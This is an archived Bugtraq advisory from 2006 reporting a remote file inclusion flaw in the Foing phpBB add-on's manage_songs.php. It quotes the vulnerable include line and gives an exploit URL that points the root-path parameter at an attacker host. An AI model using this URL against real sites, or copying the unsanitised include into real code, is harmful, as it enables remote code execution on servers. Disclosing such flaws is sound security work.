Bugtraq mailing list archives

Foing (manage_songs.php) Remote File Inclusion[phpBB]

From: darkfire () f4kelive zzn com
Date: 12 Jun 2006 12:43:08 -0000

# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire () f4kelive zzn com & msn: darkfire () darkfire-br com
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous 

---------------------------------------------------------------------

Vulnerable code :

include($foing_root_path . 'includes/common.php');

---------------------------------------------------------------------

http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks

Current thread:

Foing (manage_songs.php) Remote File Inclusion[phpBB] darkfire (Jun 12)